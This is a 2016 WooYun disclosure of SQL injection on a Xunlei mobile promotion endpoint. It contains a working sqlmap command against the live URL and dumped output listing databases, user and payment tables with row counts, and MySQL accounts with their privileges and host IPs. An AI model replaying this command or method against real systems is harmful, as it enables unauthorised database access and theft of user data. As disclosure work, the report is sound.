当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0193838

漏洞标题:迅雷某站两处以上SQL注入\报错\联合查询\含业务信息用户数据\惊现知乎数据\dba权限

相关厂商:迅雷

漏洞作者: hear7v

提交时间:2016-04-08 14:16

修复时间:2016-05-23 15:20

公开时间:2016-05-23 15:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-08: 细节已通知厂商并且等待厂商处理中
2016-04-08: 厂商已经确认,细节仅向厂商公开
2016-04-18: 细节向核心白帽子及相关领域专家公开
2016-04-28: 细节向普通白帽子公开
2016-05-08: 细节向实习白帽子公开
2016-05-23: 细节向公众公开

简要描述:

迅雷某站两处以上注入,报错,联合,单表数据量千万,总量很大,含业务信息用户数据,惊现知乎数据

详细说明:

python sqlmap.py -u "http://interface.k.xunlei.com/mobile_promote/manage/self_gets?operator=no_limit&user_type=100&version=2.0.2.16&province=no_limit&system_type=2?chanel&umeng-10900010&client_type=android-swjsq-2.0.2.16&peerid=EC1D7F9DADB8004V&time_and=1460018261265&client_version=androidswjsq-2.0.2.16&os=android-5.1.22ZTEQ519T" --user-agent "Dalvik/2.1.0 (Linux; U; Android 5.1; ZTE Q519T Build/LMY47D)"

漏洞证明:

Database: stat
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| speep_vip2_uids | 9537056 |
| t_user_vas_20151119 | 8380318 |
| action_data | 1872421 |
| gift_o | 1612178 |
| speed_stat_by_min | 1530678 |
| formal_speed_uid_history | 1395435 |
| gift | 1004079 |
| vip_history | 975731 |
| uid2kn | 847758 |
| speed_stat_by_min_bac | 643706 |
| portal_stat_by_min | 612048 |
| t_user_vas | 445839 |
| zhifu_history | 405635 |
| speep_uids | 312878 |
| query_client_version_stat_daily | 252835 |
| speed_stat_by_min_tem | 55570 |
| zhifu_stat | 43920 |
| analyse_province_speed | 39165 |
| tem_kuainiao_user_state | 33355 |
| analyse_speed_proxy_status | 23210 |
| xl7_stat_daily | 19824 |
| analyse_feedback_codeinfo | 16912 |
| plugin_conversion_stat | 16749 |
| analyse_client_speed | 9429 |
| user_ana | 9360 |
| query_province_stat_daily | 7966 |
| pc_user_version_count_pid | 6682 |
| zhifu_stat_bac_1122 | 4685 |
| zhifu_history_1117 | 4141 |
| analyse_operator_speed | 4017 |
| user_count_daily | 3882 |
| zhifu_history_20151120 | 3291 |
| user_ana_bac | 3159 |
| query_client_stat_daily | 2347 |
| stat | 1895 |
| sys_user_pms | 1822 |
| speed_time_stat_daily | 1795 |
| analyse_speed | 1119 |
| query_operator_stat_daily | 987 |
| sys_log | 856 |
| speed_ok_identity_stat | 779 |
| zhifu_stat_desc | 768 |
| zhifu_history_batch | 649 |
| zhifu_open_cycle_stat | 644 |
| pc_user_count_pid | 290 |
| android_user_count_pid | 282 |
| ios_user_count_pid | 282 |
| plugin_speed_stat | 252 |
| query_all_stat_daily | 251 |
| zhifu_open_cycle_client_stat | 161 |
| data_user_event_day_login | 157 |
| member_count_stat | 80 |
| sys_menu | 77 |
| client_jiaoji | 63 |
| xl7_stat_id2property | 63 |
| action_type | 51 |
| sys_user_upwd_log | 50 |
| sys_user | 41 |
| dial_repeat_count_sum | 31 |
| dial_repeat_count_sum_bac | 31 |
| uid_repeat_count_sum | 31 |
| member_reserved_stat | 30 |
| plugin | 22 |
| ci_sessions | 14 |
| zhifu_client | 12 |
| client_type | 9 |
| setup_consumers | 8 |
| performance_timers | 5 |
| setup_timers | 1 |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| help_relation | 1029 |
| help_topic | 508 |
| help_keyword | 465 |
| help_category | 38 |
| `user` | 8 |
| db | 4 |
| proxies_priv | 2 |
+---------------------------------------+---------+
Database: global
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| pc_promote_uid_14 | 130000 |
| mobile_promote | 23 |
| pc_promote | 10 |
+---------------------------------------+---------+
Database: interface
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| bind_record | 1 |
+---------------------------------------+---------+
Database: query_log
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| query_log_6_0_1 | 15787880 |
| query_log_6_0_5 | 15659917 |
| query_log_6_0_4 | 15549772 |
| query_log_6_0_6 | 15073810 |
| query_log_6_0_3 | 14976535 |
| query_log_6_0_7 | 14927479 |
| query_log_6_0_2 | 14919142 |
| query_log_8_0_1 | 13164756 |
| query_log_8_0_5 | 13140388 |
| query_log_8_0_4 | 13030371 |
| query_log_6_0_8 | 12887105 |
| query_log_6_0_9 | 12879007 |
| query_log_8_0_3 | 12654790 |
| query_log_8_0_2 | 12542332 |
| query_log_8_0_6 | 12505141 |
| query_log_8_0_7 | 12246204 |
| query_log_8_0_9 | 10856725 |
| query_log_8_0_8 | 10752162 |
| query_log_6_0_0 | 10297248 |
| query_log_6_1_1 | 10054511 |
| query_log_6_1_5 | 9998411 |
| query_log_6_1_4 | 9949178 |
| query_log_5_0_1 | 9931374 |
| query_log_6_1_2 | 9920209 |
| query_log_6_1_6 | 9776956 |
| query_log_6_1_7 | 9716618 |
| query_log_5_0_4 | 9263860 |
| query_log_5_0_5 | 9212598 |
| query_log_5_0_2 | 8976801 |
| query_log_5_0_3 | 8972922 |
| query_log_5_0_6 | 8662356 |
| query_log_6_1_3 | 8551096 |
| query_log_5_0_7 | 8548397 |
| query_log_8_0_0 | 8492903 |
| query_log_6_1_8 | 8321503 |
| query_log_6_1_9 | 8309844 |
| query_log_8_1_2 | 8121264 |
| query_log_8_1_3 | 8119303 |
| query_log_8_1_1 | 8048653 |
| query_log_8_1_5 | 8046545 |
| query_log_8_1_4 | 7990767 |
| query_log_8_1_6 | 7899025 |
| query_log_5_0_9 | 7871072 |
| query_log_8_1_7 | 7699257 |
| query_log_5_0_8 | 7484770 |
| query_log_7_0_1 | 7232183 |
| query_log_7_0_3 | 7197931 |
| query_log_7_0_2 | 7188413 |
| query_log_7_0_6 | 7122009 |
| query_log_7_0_5 | 7057586 |
| query_log_7_0_4 | 7007013 |
| query_log_6_1_0 | 6891653 |
| query_log_7_0_7 | 6878064 |
| query_log_8_1_9 | 6692157 |
| query_log_8_1_8 | 6675937 |
| query_log_5_0_0 | 6259222 |
| query_log_7_0_9 | 5927197 |
| query_log_7_0_8 | 5911811 |
| query_log_5_1_1 | 5866282 |
| query_log_5_1_2 | 5599932 |
| query_log_5_1_3 | 5548525 |
| query_log_8_1_0 | 5535330 |
| query_log_5_1_4 | 5456733 |
| query_log_5_1_5 | 5447971 |
| query_log_5_1_6 | 5285942 |
| query_log_5_1_7 | 5194566 |
| query_log_7_1_2 | 5035024 |
| query_log_7_0_0 | 5017385 |
| query_log_7_1_3 | 4979573 |
| query_log_7_1_1 | 4941787 |
| query_log_7_1_6 | 4828147 |
| query_log_7_1_5 | 4820992 |
| query_log_7_1_4 | 4785544 |
| query_log_5_1_9 | 4716656 |
| query_log_7_1_7 | 4697270 |
| query_log_5_1_8 | 4460258 |
| query_log_7_1_9 | 4072142 |
| query_log_7_1_8 | 4047269 |
| query_log_5_1_0 | 3989968 |
| query_log_7_1_0 | 3495220 |
| query_log_1_1_1 | 2063681 |
| query_log_1_1_3 | 1814603 |
| query_log_1_1_5 | 1807892 |
| query_log_1_1_4 | 1804971 |
| query_log_1_1_2 | 1804780 |
| query_log_1_1_6 | 1788879 |
| query_log_1_1_7 | 1763480 |
| query_log_1_0_4 | 220031 |
| query_log_1_0_7 | 217451 |
| query_log_0_0_4 | 214727 |
| query_log_0_0_1 | 212659 |
| query_log_0_0_2 | 212013 |
| query_log_0_0_5 | 211494 |
| query_log_0_1_3 | 207579 |
| query_log_0_0_6 | 206062 |
| query_log_1_0_2 | 205414 |
| query_log_0_1_2 | 204220 |
| query_log_0_1_1 | 200441 |
| query_log_0_0_7 | 196351 |
| query_log_0_1_5 | 194458 |
| query_log_0_1_4 | 190959 |
| query_log_0_1_6 | 189722 |
| query_log_1_0_3 | 187603 |
| query_log_0_0_9 | 175362 |
| query_log_0_1_7 | 174263 |
| query_log_0_0_8 | 173752 |
| query_log_1_0_8 | 169640 |
| query_log_0_1_9 | 162532 |
| query_log_0_1_8 | 162062 |
| query_log_1_0_9 | 160289 |
| query_log_0_1_0 | 138533 |
| query_log_0_0_0 | 138078 |
| query_log_1_0_0 | 129620 |
| query_log_9_1_2 | 122008 |
| query_log_9_1_3 | 118684 |
| query_log_9_1_6 | 112011 |
| query_log_9_1_4 | 110003 |
| query_log_9_1_5 | 109181 |
| query_log_9_0_2 | 106242 |
| query_log_9_1_7 | 105667 |
| query_log_9_0_3 | 105029 |
| query_log_9_0_4 | 98779 |
| query_log_9_0_5 | 97967 |
| query_log_9_0_6 | 97258 |
| query_log_9_1_1 | 92556 |
| query_log_9_1_9 | 91470 |
| query_log_9_0_7 | 91244 |
| query_log_9_1_8 | 90170 |
| query_log_9_0_1 | 87259 |
| query_log_9_0_9 | 81944 |
| query_log_9_0_8 | 80688 |
| query_log_9_1_0 | 77087 |
| query_log_9_0_0 | 64291 |
| query_log_2_1_2 | 45687 |
| query_log_2_1_3 | 45613 |
| query_log_2_1_6 | 44156 |
| query_log_2_1_4 | 43996 |
| query_log_2_1_7 | 43580 |
| query_log_2_1_1 | 43233 |
| query_log_2_1_8 | 37270 |
| query_log_2_1_9 | 36839 |
| query_log_2_1_5 | 36600 |
| query_log_4_1_2 | 33372 |
| query_log_4_1_4 | 33129 |
| query_log_4_1_5 | 33041 |
| query_log_4_1_6 | 32879 |
| query_log_4_1_7 | 32644 |
| query_log_4_1_1 | 32613 |
| query_log_2_1_0 | 31347 |
| query_log_4_1_3 | 29328 |
| query_log_4_1_8 | 27084 |
| query_log_4_1_9 | 26897 |
| query_log_4_1_0 | 23161 |
| query_log_2_0_2 | 10909 |
| query_log_2_0_6 | 10681 |
| query_log_2_0_3 | 10551 |
| query_log_2_0_4 | 10442 |
| query_log_2_0_1 | 10151 |
| query_log_2_0_5 | 10118 |
| query_log_2_0_7 | 9564 |
| query_log_2_0_8 | 8599 |
| query_log_2_0_9 | 8540 |
| query_log_4_0_3 | 7831 |
| query_log_4_0_4 | 7580 |
| query_log_4_0_6 | 7565 |
| query_log_4_0_5 | 7227 |
| query_log_4_0_2 | 7009 |
| query_log_2_0_0 | 6832 |
| query_log_4_0_1 | 6590 |
| query_log_4_0_7 | 6491 |
| query_log_4_0_8 | 5711 |
| query_log_4_0_9 | 5542 |
| query_log_4_0_0 | 4384 |
| query_log_10_0_7 | 509 |
| query_log_10_1_7 | 287 |
| query_log_3_0_1 | 210 |
| query_log_3_0_6 | 182 |
| query_log_3_0_2 | 151 |
| query_log_3_0_5 | 144 |
| query_log_3_0_7 | 140 |
| query_log_3_0_4 | 135 |
| query_log_3_1_1 | 124 |
| query_log_3_0_3 | 123 |
| query_log_3_1_6 | 120 |
| query_log_3_1_2 | 96 |
| query_log_3_1_7 | 94 |
| query_log_3_1_4 | 89 |
| query_log_3_1_3 | 85 |
| query_log_3_1_5 | 85 |
| query_log_3_0_9 | 30 |
| query_log_11_1_7 | 24 |
| query_log_3_1_9 | 24 |
| query_log_3_0_8 | 20 |
| query_log_3_1_8 | 20 |
| query_log_3_1_0 | 15 |
| query_log_3_0_0 | 12 |
| query_log_11_0_7 | 11 |
+---------------------------------------+---------+
Database: access_log
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| access_log_20160404 | 7697159 |
| access_log_20160406 | 7336387 |
| access_log_20160407 | 7305092 |
| access_log_20160405 | 7259207 |
| access_log_20160331 | 5748378 |
| access_log_20160313 | 5042542 |
| access_log_20160320 | 4978698 |
| access_log_20160319 | 4927949 |
| access_log_20160312 | 4920366 |
| access_log_20160310 | 4158324 |
| access_log_20160328 | 4158209 |
| access_log_20160329 | 4157389 |
| access_log_20160227 | 4070947 |
| access_log_20160309 | 4053648 |
| access_log_20160308 | 4025162 |
| access_log_20160221 | 3944884 |
| access_log_20160304 | 3776862 |
| access_log_20160307 | 3741766 |
| access_log_20160303 | 3686839 |
| access_log_20160302 | 3669029 |
| access_log_20160226 | 3660205 |
| access_log_20160301 | 3656808 |
| access_log_20160225 | 3601496 |
| access_log_20160220 | 3595823 |
| access_log_20160229 | 3585032 |
| access_log_20160223 | 3579818 |
| access_log_20160224 | 3576439 |
| access_log_20160222 | 3549159 |
+---------------------------------------+---------+
Database: test
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| proxy_speed_log_20150926 | 522294 |
| proxy_speed_log_20150919 | 495252 |
| proxy_speed_log_20150920 | 478269 |
| proxy_speed_log_20150925 | 465590 |
| proxy_speed_log_20150913 | 435380 |
| proxy_speed_log_20150918 | 434254 |
| proxy_speed_log_20150912 | 433320 |
| proxy_speed_log_20150924 | 424070 |
| proxy_speed_log_20150921 | 418395 |
| proxy_speed_log_20150923 | 416164 |
| proxy_speed_log_20150922 | 407650 |
| proxy_speed_log_20150914 | 393216 |
| proxy_speed_log_20150911 | 387210 |
| proxy_speed_log_20150917 | 363995 |
| proxy_speed_log_20150915 | 355420 |
| proxy_speed_log_20150916 | 350006 |
+---------------------------------------+---------+
Database: tips
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| tips_uid_54 | 130000 |
| tips_pid_36 | 96494 |
| tips_pid_38 | 96494 |
| tips_pid_32 | 50000 |
| tips_pid_34 | 46492 |
| tips | 29 |
| tips_pid_22 | 4 |
| tips_pid_26 | 4 |
| tips_pid_28 | 4 |
| tips_pid_30 | 4 |
| tips_pid_18 | 3 |
| tips_pid_24 | 3 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 2474 |
| STATISTICS | 582 |
| TABLES | 441 |
| SESSION_VARIABLES | 326 |
| GLOBAL_VARIABLES | 315 |
| GLOBAL_STATUS | 287 |
| SESSION_STATUS | 287 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 197 |
| COLLATIONS | 197 |
| KEY_COLUMN_USAGE | 129 |
| USER_PRIVILEGES | 92 |
| TABLE_CONSTRAINTS | 83 |
| PROCESSLIST | 63 |
| CHARACTER_SETS | 39 |
| PLUGINS | 17 |
| SCHEMA_PRIVILEGES | 16 |
| SCHEMATA | 10 |
| ENGINES | 6 |
| INNODB_CMP | 5 |
| INNODB_CMP_RESET | 5 |
| INNODB_CMPMEM | 5 |
| INNODB_CMPMEM_RESET | 5 |
| INNODB_TRX | 1 |
+---------------------------------------+---------+
database management system users privileges:
[*] 'nagios'@'127.0.0.1' (administrator) [2]:
privilege: REPLICATION CLIENT
privilege: SUPER
[*] 'root'@'111.161.24.187' [1]:
privilege: USAGE
[*] 'root'@'123.150.185.187' [1]:
privilege: USAGE
[*] 'root'@'127.0.0.1' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'root'@'::1' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'root'@'localhost' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'slave'@'111.161.24.187' [2]:
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
[*] 'slave'@'123.150.185.187' [2]:
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE

修复方案:

过滤,这个是纯粹没有过滤,听说要送礼物

版权声明:转载请注明来源 hear7v@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2016-04-08 15:16

厂商回复:

感谢你的反馈,已安排人员处理。

最新状态:

暂无


漏洞评价:

评价

  1. 2016-04-08 16:40 | hear7v ( 普通白帽子 | Rank:136 漏洞数:21 | 求组织收留啊)

    多给一个就是普通白猫啦